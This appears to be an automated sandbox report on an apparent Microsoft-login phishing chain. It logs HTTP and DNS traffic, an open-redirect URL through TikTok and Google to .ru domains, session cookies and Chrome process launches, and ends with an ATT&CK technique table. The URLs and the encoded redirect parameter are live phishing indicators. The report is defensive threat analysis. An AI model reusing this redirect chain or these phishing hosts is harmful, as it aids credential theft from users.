Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/grybg/0x4AAAAAAA4pnGQDZ108QgTx/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://rfll.yordickyel.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=90189d18db7dc411&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/grybg/0x4AAAAAAA4pnGQDZ108QgTx/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/grybg/0x4AAAAAAA4pnGQDZ108QgTx/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: rfll.yordickyel.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rfll.yordickyel.ru/16E/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImRzRFZ2cUx3cWpFSHFxaFQ0SlVDVEE9PSIsInZhbHVlIjoiSkYrQ05wR3JlZy85QUFNTWIyT2N2SlBVZWdjaHEvTzdIYjRmaXEwTzNiUWRjaHpJMzRuWFZ6THBSblhZOS9NcHA5VXh3dDNqY3FXd1h2OEJVMk84Mm1hdHVhMG9xU1p5bmpPckxoRUVvSWVTWXlCZGdQNlRDYmhJbzFRN2tIbEciLCJtYWMiOiI5ODE2NmY4N2VjZWFkNTkxM2NhM2I1NzFkOWNkMmYzYmRmMTZlMzVkM2FhZjJhYzdiZTIyZjYzZGNjNjZiNDFmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ijl3UExJZU5NR2hMMWhyWldBL0xyQXc9PSIsInZhbHVlIjoiYmNKMXZSOVFnVGhjTlNLL3Q3NnI4ZWh5dWRnbXBHOThFUWxMWWtBTXdWRjM2TmVYR2RPWWUxdFh0TzdkRTh4eUszRzlTaHdQcHV6aTdBNkVRMi9sOXROOHRFOEp6WTBZN1RMdnpsN0l4MUVTRSs2clB5VW9nUlFpVGpRL2YzMVAiLCJtYWMiOiI2ZWI3YmVjN2U1NzVkYzg3MWRmNzg4ZTdiZGMxMWM4ZTljMWJkZTZmZGYxOWQ4NGI5ZGQ5NTM2ZTM2YzUwN2ExIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=90189d18db7dc411&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1422477146:1736802990:9RTko5tCoC4k8VUcTFwt3F207OMr2t22jLnzo16lWnM/90189d18db7dc411/SRkucuaSX3vQiM1w7nq42R7TuFk1Bzs.dYiE18NVXHY-1736805149-1.1.1.1-nL_3Z4PBc74LqvnDGCtO5peGYrbJKKyNb8KtjtqJMyWacOJZM8kQ9Dve5o0ISwEM HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/90189d18db7dc411/1736805151192/4c683360827d691425d2166077a4e8394bbb41868f789c52dc45648af072ad47/6TTr-A3z7QYXfqu HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/grybg/0x4AAAAAAA4pnGQDZ108QgTx/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/90189d18db7dc411/1736805151193/BfLhLnbiO9Yqi-I HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/grybg/0x4AAAAAAA4pnGQDZ108QgTx/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/90189d18db7dc411/1736805151193/BfLhLnbiO9Yqi-I HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1422477146:1736802990:9RTko5tCoC4k8VUcTFwt3F207OMr2t22jLnzo16lWnM/90189d18db7dc411/SRkucuaSX3vQiM1w7nq42R7TuFk1Bzs.dYiE18NVXHY-1736805149-1.1.1.1-nL_3Z4PBc74LqvnDGCtO5peGYrbJKKyNb8KtjtqJMyWacOJZM8kQ9Dve5o0ISwEM HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1422477146:1736802990:9RTko5tCoC4k8VUcTFwt3F207OMr2t22jLnzo16lWnM/90189d18db7dc411/SRkucuaSX3vQiM1w7nq42R7TuFk1Bzs.dYiE18NVXHY-1736805149-1.1.1.1-nL_3Z4PBc74LqvnDGCtO5peGYrbJKKyNb8KtjtqJMyWacOJZM8kQ9Dve5o0ISwEM HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aqqmwlrvqzcwktvkpopvdsikJKPNGuiDBESTWYJSWBJUHBXABLMDADRMWZMKQAOEJQRIYUKFBAXNZRU HTTP/1.1Host: votcsygtms0fxymxuiwkkjlrgdrdqvm6ovda6twx3bjts5vu90kea.chiblaispi.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://rfll.yordickyel.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://rfll.yordickyel.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aqqmwlrvqzcwktvkpopvdsikJKPNGuiDBESTWYJSWBJUHBXABLMDADRMWZMKQAOEJQRIYUKFBAXNZRU HTTP/1.1Host: votcsygtms0fxymxuiwkkjlrgdrdqvm6ovda6twx3bjts5vu90kea.chiblaispi.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: www.tiktok.com
Source: global trafficDNS traffic detected: DNS query: google.com
Source: global trafficDNS traffic detected: DNS query: ilikethislife.com
Source: global trafficDNS traffic detected: DNS query: rfll.yordickyel.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: votcsygtms0fxymxuiwkkjlrgdrdqvm6ovda6twx3bjts5vu90kea.chiblaispi.ru
Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
Source: global trafficDNS traffic detected: DNS query: www.office.com
Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global trafficDNS traffic detected: DNS query: identity.nel.measure.office.net
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1422477146:1736802990:9RTko5tCoC4k8VUcTFwt3F207OMr2t22jLnzo16lWnM/90189d18db7dc411/SRkucuaSX3vQiM1w7nq42R7TuFk1Bzs.dYiE18NVXHY-1736805149-1.1.1.1-nL_3Z4PBc74LqvnDGCtO5peGYrbJKKyNb8KtjtqJMyWacOJZM8kQ9Dve5o0ISwEM HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3179sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: SRkucuaSX3vQiM1w7nq42R7TuFk1Bzs.dYiE18NVXHY-1736805149-1.1.1.1-nL_3Z4PBc74LqvnDGCtO5peGYrbJKKyNb8KtjtqJMyWacOJZM8kQ9Dve5o0ISwEMsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/grybg/0x4AAAAAAA4pnGQDZ108QgTx/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 21:52:26 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 21:52:30 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PkFnTH2Fgy%2FvJWwLVTdDXa%2FiDVhGvJM2fqAW1%2BIVns4v6HetFP7TV%2F4ou5RIJjPS1Vcumero%2FHv0DyrZf3swgXUJnzQgCzYt1qNXP3pRCTKLR0vQfU1luF17%2FXqqsQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=73177&min_rtt=73058&rtt_var=27481&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=1322&delivery_rate=38982&cwnd=220&unsent_bytes=0&cid=cadd1f4161b23913&ts=383&x=0"CF-Cache-Status: HITAge: 607Server: cloudflareCF-RAY: 90189d1f3f880f80-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1512&min_rtt=1507&rtt_var=575&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1897&delivery_rate=1886304&cwnd=207&unsent_bytes=0&cid=25b6de931678e9db&ts=4079&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 21:52:32 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: AwdvfJZqjHTebAoc1xSaSw==$AAxiDLe9fATFSmy6mLFY4w==Server: cloudflareCF-RAY: 90189d2a1bdf434b-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 21:52:35 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: 5p99meyCrwKyrQHVkdDt/g==$n2O6z5R72Eq4IcQsv6UXnQ==Server: cloudflareCF-RAY: 90189d3c5c720f98-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 21:52:40 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: txpIBm/glMuGr30ElBALpw==$kkiOKkpoMjtImnzrqRIH2Q==cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 90189d5e4faa1875-EWRalt-svc: h3=":443"; ma=86400
Source: chromecache_83.2.dr, chromecache_74.2.drString found in binary or memory: https://login.microsoftonline.com
Source: chromecache_83.2.dr, chromecache_74.2.drString found in binary or memory: https://login.windows-ppe.net
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: classification engineClassification label: mal52.win@22/70@42/14
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 --field-trial-handle=2368,i,15692943179016407377,4443873217804746429,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.tiktok.com/link/v2?aid=1988&lang=en&scene=bio_url&target=https%3A%2F%2Fgoogle.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Filikethislife.com%2Fwinner%2F0SfNj%2FY2N1ZGR5cmVAc3lmdGNvLmNvbQ==?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6ZndzdnR0c2Z6YkczJmx2L3BkL3pmd3N2dHRzZnpiRzMmRzMmQjQmdHF1dWlFNCZtc3ZDNCYzMzMmRTQmdW9mdW9wZDEzJjMzJml0ZnNnZnMzMyZFNCZ3anZyZi5xdXVpMTMmYnVmbkQ0JjEzJjEzJjEzJjEzJkIxJkY0JjMzJjkuR1VWMzMmRTQmdWZ0c2JpZDEzJmJ1Zm5ENCYxMyYxMyYxMyYxMyZCMSZGNCZlYmZpRDQmQjEmRjQmbW51aUQ0JkIxJkY0Jm9icXRHMyZENCZkazdoWlZENCZ0ezVNRTQmTFhteDFPUWdkWFBZc3s1d0c5e1FFNiZDT0Y0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEm"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 --field-trial-handle=2368,i,15692943179016407377,4443873217804746429,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
